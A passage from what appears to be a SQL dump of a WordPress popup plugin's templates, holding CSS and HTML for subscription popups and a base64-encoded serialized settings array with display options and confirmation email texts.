4px;\r\n  	border-style: solid;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	padding: 10px;\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #000;\r\n    font-family: \'PT Sans\', sans-serif;\r\n	text-align: center;\r\n	font-size: 28px;\r\n	letter-spacing: -1px;\r\n	line-height: 40px;\r\n	letter-spacing: -1px;\r\n	margin-top: 15px;\r\n	display: block;\r\n  	margin-bottom: 15px;;\r\n	padding-left: 20px;\r\n	-moz-text-shadow: 0px 0px 1px #000;\r\n	-webkit-text-shadow: 0px 0px 1px #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 1% 1% 1% 1%;\r\n	text-align:right;\r\n	margin-bottom: 20px;\r\n  	padding-left: 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	/*width: 100%;*/\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: 0px solid #d1b36d;\r\n	border-radius: 4px !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 2px 2px 2px #dcdcdc inset;\r\n  	padding-left: 20px;\r\n  	font-size: 15px;\r\n	width:100%;\r\n  	max-width: 284px;\r\n	display: block;\r\n	float: left;\r\n  	border: 1px solid #e2e2e2;\r\n  	margin-top: 1px;\r\n  	background-color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n  	border-radius: 4px !important;\r\n  	margin-left: -1px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n	width: 30%;\r\n  	padding: 6px 0 0 0;\r\n  	text-align: center;\r\n  	cursor: pointer;\r\n  	text-decoration: none;\r\n  	color: #333333;\r\n  	font-size: 17px;\r\n  	font-family: \'PT Sans\', sans-serif;\r\n  	text-shadow: 0px 1px 0px #FFF;\r\n  	display:block;\r\n  	float: left;\r\n	margin-left: 30px;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: [bg_color_1] 100%;\r\n   	box-shadow: -4px -4px 0px rgba(0, 0, 0, 0.1) inset;\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	color: #fff;\r\n    font-size: 20px;\r\n    text-shadow: 1px 1px 1px #000;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n   box-shadow: 4px 4px 0px rgba(0, 0, 0, 0.1) inset;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n	float: left;\r\n  	width: 90%;\r\n	font-family: \'PT Serif\', serif;\r\n  	color: #666666;\r\n  	font-size: 15px;\r\n  	line-height: 22px;\r\n  	display: block;\r\n  	margin-bottom: 27px;\r\n    padding: 0px 20px 0px 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n	top: 15px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\n	margin-top:20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubMsg {\r\n	clear: both;\r\n   	float: left;\r\n}\r\n','ExcluziveListings.jpg',1,1,1,1,0,0,0,'2015-01-10 17:59:43',15,0),(18,'Best Of Collection',1,0,'YTozOntzOjQ6Im1haW4iO2E6MzA6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjtzOjI0OiJoaWRlX2Zvcl91c2VyX3JvbGVzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjkwOntzOjU6IndpZHRoIjtzOjM6IjQwMCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czoxODoiYmdfb3ZlcmxheV9vcGFjaXR5IjtzOjM6IjAuNSI7czoxNToiYmdfb3ZlcmxheV90eXBlIjtzOjU6ImNvbG9yIjtzOjE2OiJiZ19vdmVybGF5X2NvbG9yIjtzOjQ6IiMwMDAiO3M6MTQ6ImJnX292ZXJsYXlfaW1nIjtzOjA6IiI7czoxODoiYmdfb3ZlcmxheV9pbWdfcG9zIjtzOjc6InN0cmV0Y2giO3M6OToiYmdfdHlwZV8wIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18wIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMCI7czo3OiIjZWVlZTIyIjtzOjk6ImJnX3R5cGVfMSI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMSI7czozNDoiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvYnRuLnBuZyI7czoxMDoiYmdfY29sb3JfMSI7czo3OiIjMDA5MzI3IjtzOjk6ImJnX3R5cGVfMiI7czozOiJpbWciO3M6ODoiYmdfaW1nXzIiO3M6NDE6IltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzL2ZseWluLWZyZWUucG5nIjtzOjEwOiJiZ19jb2xvcl8yIjtzOjA6IiI7czoxMDoiZm9udF9sYWJlbCI7czo3OiJkZWZhdWx0IjtzOjE2OiJsYWJlbF9mb250X2NvbG9yIjtzOjc6IiMwMDAwMDAiO3M6MTA6ImZvbnRfdHh0XzAiO3M6NzoiZGVmYXVsdCI7czoxNzoidGV4dF9mb250X2NvbG9yXzAiO3M6NzoiIzAwMDAwMCI7czoxMToiZm9udF9mb290ZXIiO3M6NzoiZGVmYXVsdCI7czoxNzoiZm9vdGVyX2ZvbnRfY29sb3IiO3M6NzoiIzU4NTg1OCI7czoxNToicmVzcG9uc2l2ZV9tb2RlIjtzOjM6ImRlZiI7czoxNzoicmVpZHJlY3Rfb25fY2xvc2UiO3M6MDoiIjtzOjk6ImNsb3NlX2J0biI7czo5OiJzcXJfY2xvc2UiO3M6NzoiYnVsbGV0cyI7czoxMToibGlzdHNfZ3JlZW4iO3M6MTk6ImxheWVyX3JlbF9zZWxlY3RvcnMiO3M6MDoiIjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6OToiZW5iX2xhYmVsIjtzOjE6IjEiO3M6NToibGFiZWwiO3M6Mzc6IlNpZ24gVXAgVG8gUmVjZWl2ZSBFeGNsdXNpdmUgTGlzdGluZyAiO3M6OToiZm9vdF9ub3RlIjtzOjExODoiV2UgcmVzcGVjdCB5b3VyIHByaXZhY3kuIFlvdXIgaW5mb3JtYXRpb24gd2lsbCBub3QgYmUgc2hhcmVkIHdpdGggYW55IHRoaXJkIHBhcnR5IGFuZCB5b3UgY2FuIHVuc3Vic2NyaWJlIGF0IGFueSB0aW1lICI7czoxNToiZW5iX3NtX2ZhY2Vib29rIjtzOjE6IjEiO3M6MTc6ImVuYl9zbV9nb29nbGVwbHVzIjtzOjE6IjEiO3M6MTQ6ImVuYl9zbV90d2l0dGVyIjtzOjE6IjEiO3M6OToic21fZGVzaWduIjtzOjQ6ImJveHkiO3M6ODoiYW5pbV9rZXkiO3M6NDoibm9uZSI7czoxMzoiYW5pbV9kdXJhdGlvbiI7czowOiIiO3M6MTM6ImVuYl9zdWJzY3JpYmUiO3M6MToiMSI7czo4OiJzdWJfZGVzdCI7czo5OiJ3b3JkcHJlc3MiO3M6MjM6InN1Yl93cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjE5OiJzdWJfYXdlYmVyX2xpc3RuYW1lIjtzOjA6IiI7czoyMToic3ViX2F3ZWJlcl9hZHRyYWNraW5nIjtzOjA6IiI7czoyMToic3ViX21haWxjaGltcF9hcGlfa2V5IjtzOjA6IiI7czoyNToic3ViX21haWxjaGltcF9ncm91cHNfZnVsbCI7czowOiIiO3M6MTg6InN1Yl9hcl9mb3JtX2FjdGlvbiI7czowOiIiO3M6MTA6InN1Yl9zZ2FfaWQiO3M6MDoiIjtzOjE1OiJzdWJfc2dhX2xpc3RfaWQiO3M6MDoiIjtzOjIxOiJzdWJfc2dhX2FjdGl2YXRlX2NvZGUiO3M6MDoiIjtzOjE0OiJzdWJfdjZfYXBpX2tleSI7czowOiIiO3M6MTY6InN1Yl95bWxwX2FwaV9rZXkiO3M6MDoiIjtzOjEzOiJzdWJfeW1scF9uYW1lIjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjU6ImVtYWlsIjthOjg6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czoxMDoic2V0X3ByZXNldCI7czowOiIiO3M6MzoiZW5iIjtzOjE6IjEiO31zOjQ6Im5hbWUiO2E6ODp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjtzOjEwOiJzZXRfcHJlc2V0IjtzOjA6IiI7fX1zOjk6ImJsYWNrbGlzdCI7czowOiIiO3M6MTU6ImJsYWNrbGlzdF9lcnJvciI7czoyNjoiWW91ciBlbWFpbCBpcyBpbiBibGFja2xpc3QiO3M6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjIwOiJzdWJfdHh0X2V4aXN0c19lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoxNjoic3ViX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gc3Vic2NyaXB0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InN1Yl90eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NzoiWW91IHN1YnNjcmliZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgc3Vic2NyaXB0aW9uLiBJZiB5b3UgZGlkIG5vdCBzdWJzY3JpYmUgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoyNToic3ViX3JlZGlyZWN0X2VtYWlsX2V4aXN0cyI7czowOiIiO3M6MTM6InN1Yl9idG5fbGFiZWwiO3M6ODoiSm9pbiBOb3ciO3M6MTM6InN1Yl9uZXdfZW1haWwiO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjE1OiJzdWJfbmV3X3N1YmplY3QiO3M6MjY6Ik5ldyBTdWJzY3JpYmVyIG9uIERldiBTaXRlIjtzOjE1OiJzdWJfbmV3X21lc3NhZ2UiO3M6MTI5OiJZb3UgaGF2ZSBuZXcgc3Vic2NyaWJlciBvbiB5b3VyIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCBoZXJlIGlzIHN1YnNjcmliZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6ODoibG9naW5fYnkiO3M6ODoidXNlcm5hbWUiO3M6MTg6ImxvZ2luX3JlZGlyZWN0X3VybCI7czowOiIiO3M6MTU6ImxvZ2luX2J0bl9sYWJlbCI7czo1OiJMb2dpbiI7czoyMzoicmVnX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTM6InJlZ19idG5fbGFiZWwiO3M6ODoiUmVnaXN0ZXIiO3M6MTA6InJlZ19maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InJlZ190eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJyZWdfdHh0X3N1Y2Nlc3MiO3M6Mjc6IlRoYW5rIHlvdSBmb3IgcmVnaXN0cmF0aW9uISI7czoyMToicmVnX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJyZWdfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSByZWdpc3RyYXRpb24gb24gW3NpdGVuYW1lXSI7czoyNToicmVnX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InJlZ190eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk2OiJZb3UgcmVnaXN0ZXJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciByZWdpc3RyYXRpb24uIElmIHlvdSBkaWQgbm90IHJlZ2lzdGVyIGhlcmUgLSBqdXN0IGlnbm9yZSB0aGlzIG1lc3NhZ2UuIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjM3OiJbc2l0ZW5hbWVdIFlvdXIgdXNlcm5hbWUgYW5kIHBhc3N3b3JkIjtzOjI4OiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo2NToiVXNlcm5hbWU6IFt1c2VyX2xvZ2luXTxiciAvPlBhc3N3b3JkOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MTM6InJlZ19uZXdfZW1haWwiO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjE1OiJyZWdfbmV3X21lc3NhZ2UiO3M6MTIxOiJZb3UgaGF2ZSBuZXcgbWVtYmVyIG9uIHlvdXIgc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4sIGhlcmUgdXMgbWVtYmVyIGluZm9ybWF0aW9uOjxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjtzOjEyOiJzdGF0X2dhX2NvZGUiO3M6MDoiIjtzOjU6InR4dF8wIjtzOjE3MjoiPHA+UG9wdXAgYnkgU3Vwc3lzdGljIGxldHMgeW91IGVhc2lseSBjcmVhdGUgZWxlZ2FudCBvdmVybGFwcGluZyB3aW5kb3dzIHdpdGggdW5saW1pdGVkIGZlYXR1cmVzLiBQb3AtdXBzIHdpdGggU2xpZGVyLCBMaWdodGJveCwgQ29udGFjdCBhbmQgU3Vic2NyaXB0aW9uIGZvcm1zIGFuZCBtb3JlPC9wPiI7fXM6MTA6Im9wdHNfYXR0cnMiO2E6Mjp7czo5OiJiZ19udW1iZXIiO3M6MToiMyI7czoxNjoidHh0X2Jsb2NrX251bWJlciI7czoxOiIxIjt9fQ==','<link rel=\"stylesheet\" type=\"text/css\" href=\"//fonts.googleapis.com/css?family=Amatic+SC\" />\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n			<div class=\"ppsPopupLogo\"></div>\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n						[sub_fields_html]\r\n						<input class=\"butt\" type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsRightCol\">\r\n				[if enb_sm]\r\n					<div style=\"clear: both;\"></div>\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n				<div>\r\n				</div>\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: \'arial\', arial;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 100%;\r\n  	border-width: 5px;\r\n  	border-radius: 4px;\r\n    box-shadow: 0 0 10px rgba(0,0,0,0.5);\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n    padding: 10px 0 2px 0;\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #000;\r\n      font-family: Comic Sans, Comic Sans MS, cursive;\r\n	text-align: center;\r\n	font-size: 28px;\r\n	letter-spacing: -1px;\r\n	line-height: 40px;\r\n	letter-spacing: -1px;\r\n	margin-top: 15px;\r\n	display: block;\r\n  	margin-bottom: 15px;;\r\n	padding-left: 20px;\r\n	-moz-text-shadow: 0px 0px 1px #000;\r\n	-webkit-text-shadow: 0px 0px 1px #000;\r\n}\r\n\r\n.ppsPopupLogo{\r\n  width: 100%;\r\n  height: 200px;\r\n  float: left;\r\n [if bg_type_2 == \'color\']\r\n  	background: [bg_color_2] 100%;\r\n  [elseif bg_type_2 == \'img\']\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 1% 1% 1% 1%;\r\n	margin-bottom: 20px;\r\n  	padding-left: 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input {\r\n	/*width: 100%;*/\r\n  	margin-bottom: 10px;\r\n  	height: 30px;\r\n  	border: 0px solid #d1b36d;\r\n	border-radius: 4px !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email] {\r\n  -webkit-transition: opacity .5s;\r\n  transition: opacity .5s;\r\n  border-radius: 5px;\r\n  -moz-border-radius: 5px;\r\n  -webkit-border-radius: 5px;\r\n  margin: 0 0 10px;\r\n  width: 80%;\r\n  background: #f8fafa;\r\n  padding: 11px 20px;\r\n  border: 1px solid #e4e9e9;\r\n  color: #b3b3b3;\r\n  font-size: 13px;\r\n  	height: 35px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[name=\"email\"] {\r\n    -webkit-transition: opacity .5s;\r\n  transition: opacity .5s;\r\n  border-radius: 5px;\r\n  -moz-border-radius: 5px;\r\n  -webkit-border-radius: 5px;\r\n  margin: 0 0 10px;\r\n  width: 80%;\r\n  background: #f8fafa;\r\n  padding: 11px 20px;\r\n  border: 1px solid #e4e9e9;\r\n  color: #b3b3b3;\r\n  font-size: 13px;\r\n  	height: 35px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] 